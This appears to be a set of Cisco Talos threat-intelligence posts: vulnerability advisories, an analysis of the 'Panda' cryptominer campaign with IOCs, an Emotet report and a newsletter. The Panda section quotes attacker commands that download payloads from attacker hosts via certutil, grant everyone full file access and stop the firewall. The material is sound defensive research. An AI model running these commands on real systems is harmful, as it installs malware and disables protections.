                An exploitable memory corruption vulnerability exists in AMD ATIDXX64.DLL driver, versions 25.20.15031.5004 and 25.20.15031.9002. A specially crafted pixel shader can cause an out-of-bounds memory write. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability can be triggered from within a VMware guest, potentially allowing code execution on the associated VMware host.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that this vulnerability affects AMD ATIDXX64.DLL, versions 25.20.15031.5004 and 25.20.15031.9002, while running on the Radeon RX 550/550 Series. This vulnerability can only be exploited when VMware Workstation 15 version, 15.0.4,build-12990004 with Windows 10 x64 as the guestVM is running.


                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 49978, 49979

                New Cisco Talos web reputation verdicts

                $
                0
                0
                Talos has updated and expanded the Talos Threat Levels used to describe our web reputation verdicts. 

                There will be no impact to the efficacy to Talos Web Reputation. For a short period, TalosIntelligence.com will show both the new and the old threat level verdicts.

                Here’s a rundown of our new Threat Levels verbiage.

                Vulnerability Spotlight: Multiple vulnerabilities in Aspose PDF API

                $
                0
                0

                Marcin Noga of Cisco Talos discovered these vulnerabilities.

                Cisco Talos recently discovered multiple remote code execution vulnerabilities in the Aspose.PDF API. Aspose provides a series of APIs for manipulating or converting a large family of document formats. These vulnerabilities exist in APIs that help process PDFs. An attacker could exploit these vulnerabilities by sending a specially crafted, malicious file to the target and trick them into opening it while using the corresponding API.

                In accordance with our coordinated disclosure policy, Cisco Talos worked with Aspose to ensure that these issues are resolved and that an update is available for affected customers.

                Vulnerability details

                Aspose.PDF FunctionType 0 remote code execution vulnerability (TALOS-2019-0809/CVE-2019-5042)

                An exploitable use-after-free vulnerability exists in the way FunctionType 0 PDF elements are processed in Aspose.PDF. A specially crafted PDF can cause a dangling heap pointer, resulting in a use-after-free. An attacker can send a malicious PDF to trigger this vulnerability. 

                Read the complete vulnerability advisory here for additional information. 

                Aspose.PDF for C++  LZWDecode filter predictor remote code execution vulnerability (TALOS-2019-0855/CVE-2019-5066)

                An exploitable use-after-free vulnerability exists in the way LZW compressed streams are processed in Aspose.PDF 19.2. A specially crafted PDF can cause a dangling heap pointer, resulting in a use-after-free. To trigger this vulnerability, a specifically crafted PDF document needs to be processed by the target application.

                Read the complete vulnerability advisory here for additional information.

                Aspose.PDF for C++  parent generation remote code execution vulnerability (TALOS-2019-0856/CVE-2019-5067)

                An uninitialized memory access vulnerability exists in the way Aspose.PDF for C++ 19.2 handles invalid parent object pointers. A specially crafted PDF can cause a read and write from uninitialized memory, resulting in memory corruption and possibly arbitrary code execution. To trigger this vulnerability, a specifically crafted PDF document needs to be processed by the target application.

                Read the complete vulnerability advisory here for additional information. 

                Versions tested

                Talos tested and confirmed that these vulnerabilities affect Aspose.PDF, version 19.2.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 50730, 50731, 50738, 50739


                Cryptocurrency miners aren’t dead yet: Documenting the voracious but simple “Panda”

                $
                0
                0
                By Christopher Evans and David Liebenberg.


                Executive summary

                A new threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information.

                Panda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.

                Talos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread "MassMiner" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns.


                First sightings of the not-so-elusive Panda

                We first observed this actor in July of 2018 exploiting a WebLogic vulnerability (CVE-2017-10271) to drop a miner that was associated with a campaign called "MassMiner" through the wallet, infrastructure, and post-exploit PowerShell commands used.

                Panda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 (CVE-2017-5638). They used PowerShell post-exploit to download a miner payload called "downloader.exe," saving it in the TEMP folder under a simple number filename such as "13.exe" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000.

                By October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times.
                The sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block.

                One of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name "Panda."

                Bulehero connection

                Around the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called "download.exe" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as "13.exe" and execute it. The file server turned out to be an instance of HFS hosting four malicious files.

                Running the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining.

                Additionally, the sample attempts to shut down the victim's firewall with commands such as "cmd /c net stop MpsSvc". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe.

                For example:
                cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\appveif.exe /p everyone:F
                Both of these behaviors have also been observed in previous MassMiner infections.

                The malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign.

                Additionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the "Shadow Brokers" exploits and were installed in a suspiciously named directory: "\Windows\InfusedAppe\Eternalblue139\specials\".

                Evolution of Panda

                In January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China.

                Panda used this vulnerability to both directly download a file called "download.exe" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path "/public/hydra.php", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to "/public/hydra.php". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations.

                In March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in.

                At the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called "download.exe" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named "wercplshost.exe" from fid[.]hognoob[.]se as well as a configuration file called "cfg.ini" from uio[.]hognoob[.]se, which provides configuration details for the miner.

                "Wercplshost.exe" contains exploit modules designed for lateral movement, many of which are related to the "Shadow Brokers" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords.

                Soon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: "certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\Windows\Temp\upnpprhost.exe". The coinminer is also run using the command "cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\[filename].exe".

                The updated payload still includes exploit modules designed for lateral movement, many of which are related to the "Shadow Brokers" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to "Scant.txt" (note the typo). The sample also writes a list of hardcoded IP ranges to "ip.txt" and passes it to Masscan to scan for port 445 and saves the results to "results.txt." This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords

                In June, Panda began targeting a newer WebLogic vulnerability, CVE-2019-2725, but their TTPs remained the same.

                Recent activity

                Panda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of "a" - "z" characters and the last five consisting of digits (e.g., "xblzcdsafdmqslz19595.exe"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se.

                Besides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz.

                One difference is that several samples contained a Gh0st RAT default mutex "DOWNLOAD_SHELL_MUTEX_NAME" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior.

                On August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as "BBBBB,", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18.

                In line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to "oo[.]mygoodluck[.]best:51888:WervPoxySvc", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club.

                Cisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best.


                Conclusion

                Panda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated.

                However, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold.

                Panda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations.


                COVERAGE

                For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: Blocking Cryptocurrency Mining Using Cisco Security Products

                Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

                Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                IOCs

                Domains

                a45[.]bulehero[.]in
                a46[.]bulehero[.]in
                a47[.]bulehero[.]in
                a48[.]bulehero[.]in
                a88[.]bulehero[.]in
                a88[.]heroherohero[.]info
                a[.]bulehero[.]in
                aic[.]fxxxxxxk[.]me
                axx[.]bulehero[.]in
                b[.]bulehero[.]in
                bulehero[.]in
                c[.]bulehero[.]in
                cb[.]fuckingmy[.].life
                cnm[.]idc3389[.]top
                down[.]idc3389[.]top
                fid[.]hognoob[.]se
                fxxk[.]noilwut0vv[.]club
                haq[.]hognoob[.]se
                idc3389[.]top
                idc3389[.]cc
                idc3389[.]pw
                li[.]bulehero2019[.]club
                list[.]idc3389[.]top
                mi[.]oops[.]best
                mx[.]oops[.]best
                nrs[.]hognoob[.]se
                oo[.]mygoodluck[.]best
                pool[.]bulehero[.]in
                pxi[.]hognoob[.]se
                pxx[.]hognoob[.]se
                q1a[.]hognoob[.]se
                qie[.]fxxxxxxk[.]me
                rp[.]oiwcvbnc2e[.]stream
                uio[.]heroherohero[.]info
                uio[.]hognoob[.]se
                upa1[.]hognoob[.]se
                upa2[.]hognoob[.]se
                wiu[.]fxxxxxxk[.]me
                yxw[.]hognoob[.]se
                zik[.]fxxxxxxk[.]me

                IPs

                184[.]168[.]221[.]47
                172[.]104[.]87[.]6
                139[.]162[.]123[.]87
                139[.]162[.]110[.]201
                116[.]193[.]154[.]122
                95[.]128[.]126[.]241
                195[.]128[.]127[.]254
                195[.]128[.]126[.]120
                195[.]128[.]126[.]243
                195[.]128[.]124[.]140
                139[.]162[.]71[.]92
                3[.]123[.]17[.]223
                46[.]173[.]217[.]80
                5[.]56[.]133[.]246

                SHA-256

                2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1
                fa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220
                2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb
                829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08
                8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec
                1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27
                0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5
                f9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a
                34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb
                29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f
                3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976
                a415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1
                4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c
                8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21
                991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e
                a3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1
                9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3
                d5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca
                29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f
                6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d

                Monero Wallets

                49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126
                4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh
                44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L

                Emotet is back after a summer break

                $
                0
                0
                This blog post was written by Colin Grady, William Largent, and Jaeson Schultz.


                Emotet is still evolving, five years after its debut as a banking trojan. It is one of the world's most dangerous botnets and malware droppers-for-hire. The malware payloads dropped by Emotet serve to more fully monetize their attacks, and often include additional banking trojans, information stealers, email harvesters, self-propagation mechanisms and even ransomware.

                At the beginning of June 2019, Emotet's operators decided to take an extended summer vacation. Even the command and control (C2) activities saw a major pause in activity. However, as summer begins drawing to a close, Talos and other researchers started to see increased activity in Emotet's C2 infrastructure. And as of Sept. 16, 2019, the Emotet botnet has fully reawakened, and has resumed spamming operations once again. While this reemergence may have many users scared, Talos' traditional Emotet coverage and protection remains the same. We have a slew of new IOCs to help protect users from this latest push, but past Snort coverage will still block this malware, as well traditional best security practices such as avoiding opening suspicious email attachments and using strong passwords.

                Emotet's email propagation

                One of Emotet's most devious methods of self-propagation centers around its use of socially engineered spam emails. Emotet's reuse of stolen email content is extremely effective. Once they have swiped a victim's email, Emotet constructs new attack messages in reply to some of that victim's unread email messages, quoting the bodies of real messages in the threads.


                The email above illustrates Emotet's social engineering. In this example, we have a malicious email from Emotet, and contained inside the body of the email we can see a previous conversation between two aides to the mayor of a U.S. city.
                1. Initially, Lisa sent an email to Erin about placing advertisements to promote an upcoming ceremony where the mayor would be in attendance.
                2. Erin replied to Lisa inquiring about some of the specifics of the request.
                3. Lisa became infected with Emotet. Emotet then stole the contents of Lisa's email inbox, including this message from Erin.
                4. Emotet composed an attack message in reply to Erin, posing as Lisa. An infected Word document is attached at the bottom.
                It's easy to see how someone expecting an email as part of an ongoing conversation could fall for something like this, and it is part of the reason that Emotet has been so effective at spreading itself via email. By taking over existing email conversations, and including real Subject headers and email contents, the messages become that much more randomized, and more difficult for anti-spam systems to filter.

                Emotet's email sending infrastructure

                This message wasn't sent using Lisa's own Emotet-infected computer through her configured outbound mail server. Instead, this email was transmitted from an Emotet infection in a completely different location, utilizing a completely unrelated outbound SMTP server.

                It turns out that in addition to stealing the contents of victims' inboxes, Emotet also swipes victims' credentials for sending outbound email. Emotet then distributes these stolen email credentials to other bots in its network, who then utilize these stolen credentials to transmit Emotet attack messages.

                In the process of analyzing Emotet, Cisco Talos has detonated hundreds of thousands of copies of the Emotet malware inside of our malware sandbox, Threat Grid. Over the past 10 months, Emotet has attempted to use Threat Grid infections as outbound spam emitters nearly 19,000 times.

                When Emotet's C2 designates one of its infections as a spam emitter, the bot will receive a list of outbound email credentials containing usernames, passwords and mail server IP addresses. Over the past 10 months, Cisco Talos collected 349,636 unique username/password/IP combos. Of course, many larger networks deploy multiple mail server IP addresses, and in the data we saw a fair amount of repeat usernames and passwords using different, but related mail server IPs. Eliminating the server IP data, and looking strictly at usernames and passwords, Talos found 202,675 unique username-password combinations.

                Since Talos was observing infections over a monthslong timeframe, we were able to make an assessment regarding the average lifespan of the credentials we saw Emotet distributing. In all, the average lifespan of a single set of stolen outbound email credentials was 6.91 days. However, when we looked more closely at the distribution, 75 percent of the credentials stolen and used by Emotet lasted under one day. Ninety-two percent of the credentials stolen by Emotet disappeared within one week. The remaining 8 percent of Emotet's outbound email infrastructure had a much longer lifespan.

                In fact, we found some outbound credentials that were utilized by Emotet for the entire duration of our sample data. Below is a graph illustrating the volume of credentials having a longer lifespan with days along the X-axis vs. the number of stolen SMTP credentials along the Y-axis. There are quite a few stolen outbound email credentials that Emotet has been using over a period of many months. Talos is reaching out to the affected networks in an attempt to remediate some of the current worst offenders.

                Emotet's recipients

                As opposed to simply drafting new attack messages, stealing old email messages and jumping into the middle of an existing email conversation is a fairly expensive thing to do. Looking at all the email Emotet attempted to send during the month of April 2019, we found Emotet included stolen email conversations only approximately 8.5 percent of the time. Since Emotet has reemerged, however, we have seen an increase in this tactic with stolen email threads appearing in almost one quarter of Emotet's outbound emails.

                Emotet also apparently has a considerable database of potential recipients to draw from. Looking at all of the intended recipients of Emotet's attack messages in April 2019, we found that 97.5 percent of Emotet's recipients received only a single message. There was however, one victim, who managed to receive ten Emotet attack messages during that same period. Either Emotet has something against that guy in particular, or more likely, it is simply an artifact about the method Emotet uses to distribute victim email addresses to its outbound spam emitters.

                A word about passwords


                Emotet's stolen outbound email credentials contained over 176,000 unique passwords, so we decided to have a look at the passwords by themselves, without regard to the username or mail server IP. Below is a list of the most common passwords, and on the left hand side is the number of unique outbound SMTP credentials found utilizing that particular password.


                It comes as no surprise that perennially problematic passwords such as "123456" and "password" (along with numerous variations of those) appear with a significant degree of prominence. However, there are other passwords in the set that are much more unique in terms of "Why would so many different accounts use that same strange password?" Most likely these are victims of Emotet who themselves controlled a large number of distinct email boxes while also committing the cybersecurity cardinal sin of reusing the same password across many different accounts.



                Conclusion

                Emotet has been around for years, this reemergence comes as no surprise. The good news is, the same advice for staying protected from Emotet remains. To avoid Emotet taking advantage of your email account, be sure to use strong passwords and opt in to multi-factor authentication, if your email provider offers that as an option. Be wary of emails that seem to be unexpected replies to old threads, emails that seem suspiciously out of context, or those messages that come from familiar names but unfamiliar email addresses. As always, you can rely on Snort rules to keep your system and network protected, as well. Previous Snort rules Talos has released will still protect from this wave of Emotet, and there is always the opportunity for new coverage in the future.

                This is also a good opportunity to recognize that security researchers and practitioners can never take their foot off the gas. When a threat group goes silent, it's unlikely they'll be gone forever. Rather, this opens up the opportunity for a threat group to return with new IOCs, tactics, techniques and procedures or new malware variants that can avoid existing detection. Just as we saw earlier this year with the alleged breakup of the threat actors behind Gandcrab, it's never safe to assume a threat is gone for good.

                IoCs

                Indicators of compromise related to Emotet's latest activity can be found here.

                Coverage

                Additional ways our customers can detect and block this threat are listed below.

                Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

                Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

                Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), andMeraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                Threat Source newsletter (Sept. 19, 2019)

                $
                0
                0

                Newsletter compiled by Jon Munshaw.

                Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                We’re all still trying to shake off the summer. Gone are the early Fridays, beach vacations and days by the pool. Turns out, attackers may be brushing the same things off. The ever-present Emotet went quiet over the summer, but it’s back now with a slew of new campaigns. While this may sound concerning, the same protections and coverage you’ve always used will keep you safe.

                And, speaking of things that won’t stay down, cryptocurrency miners still aren’t going anywhere. We've discovered a new threat actor we’re calling “Panda” that is rapidly spreading miners, even as digital currencies decline in value.

                This was also a busy week for vulnerability discovery. We’ve got three new vulnerability spotlights out: the Aspose PDF API, Atlassian’s Jira software and the AMD ATI Radeon line of graphics cards.

                We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.


                Upcoming public engagements with Talos

                Event: “DNS on Fire” at Virus Bulletin 2019
                Location: Novotel London West hotel, London, U.K.
                Date: Oct. 2 - 4
                Speaker: Warren Mercer and Paul Rascagneres
                Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

                Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
                Location: Metro Toronto Convention Center, Toronto, Canada
                Date: Oct. 7 - 10
                Speaker: Edmund Brumaghin and Earl Carter
                Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                Cyber Security Week in Review

                • Windows rolled out a new updater tool that is designed to make it easier for users to apply patches. But researchers have already found a string of bugs and flaws. 
                • The LastPass password manager contained a security vulnerability that could have leaked users’ login information to sites they previously visited while utilizing LastPass. The company says it’s released an update to fix this flaw. 
                • An advanced threat group has compromised the networks of at least 11 information technology service providers, likely with the hopes of gaining access to their customers’ systems. At least two of the attacks allowed the malicious actors to gain admin-level access to the victims’ networks. 
                • Facebook plans to assemble a “court” to make the final decision on content restrictions. The social media giant says both the company itself and users will be able to appeal decisions to this board. 
                • The FBI attempted to install a backdoor on mobile devices sold by an encrypted cellular company. Phantom Secure, which is known for selling encrypted phones to some drug cartel members, was later shut down in 2018 for data leaks and its connection to criminal operations. 
                • Many popular smart TV manufacturers collect and sell users’ viewing habits and other personal information, including their IP address. 
                • Australia believes China is behind an attack from earlier this year on its parliament and three largest political parties. However, leaders there have been reticent to publicly call China out at the risk of disrupting Australia’s economy. 
                • A global cyber security trade group suspended Huawei from its board. Huawei blamed the United States for the disruption, saying American influence led the group to making this decision. 
                • New banking regulations in Europe could leave financial institutions more open to cyber attacks, according to a new report. Known as “Open Banking,” these new policies are aimed at giving customers more control over the information they share with banks, but it also brings third-party financial technology companies into the fold. 

                Notable recent security issues

                Title: Remote code execution vulnerability in some AMD Radeon cards 
                Description: A line of AMD Radeon cards contains a remote code execution vulnerability in their ATIDXX64.DLL driver. AMD produces the Radeon line of hardware, which includes graphics cards and graphics processing units. This specific vulnerability exists on the Radeon RX 550 and the 550 Series while running VMWare Workstation 15. An attacker could exploit this vulnerability by supplying a malformed pixel shared inside the VMware guest operating system to the driver. This could corrupt memory in a way that would allow the attacker to gain the ability to remotely execute code on the victim machine.
                Snort SIDs: 49978, 49979 (Written by Tim Muniz)

                Title: Atlassian Jira service contains multiple vulnerabilities, including remote JavaScript execution
                Description: Atlassian’s Jira software contains multiple vulnerabilities that could allow an attacker to carry out a variety of actions, including the disclosure of sensitive information and the remote execution of JavaScript code. Jira is a piece of software that allows users to create, manage and organize tasks and manage projects. These bugs could create a variety of scenarios, including the ability to execute code inside of Jira and the disclosure of information inside of tasks created in Jira, including attached documents.
                Snort SIDs: 50110, 50111 (Written by Amit Raut), 50114 (Written by Josh Williams)

                Most prevalent malware files this week

                SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510 
                MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                Typical Filename: xme64-2141.exe
                Claimed Product: N/A
                Detection Name: W32.7ACF71AFA8-95.SBX.TG

                SHA 256: 26da22347f1d91f6ca56b7c47644a776b72251d3de11c90d9fd77556d5236f5e 
                MD5: f6f6039fc64ad97895142dc99554e971
                Typical Filename: CSlast.gif
                Claimed Product: N/A
                Detection Name: W32.26DA22347F-100.SBX.TG

                SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
                MD5: db69eaaea4d49703f161c81e6fdd036f
                Typical Filename: xme32-2141-gcc.exe
                Claimed Product: N/A
                Detection Name: W32.46B241E3D3-95.SBX.TG

                SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7 
                MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f
                Typical Filename: sayext.gif
                Claimed Product: N/A
                Detection Name: W32.093CC39350-100.SBX.TG

                SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
                MD5: 799b30f47060ca05d80ece53866e01cc
                Typical Filename: mf2016341595.exe
                Claimed Product: N/A
                Detection Name: W32.Generic:Gen.22fz.1201 

                Threat Roundup for September 13 to September 20

                $
                0
                0
                Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 13 and Sept. 20. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

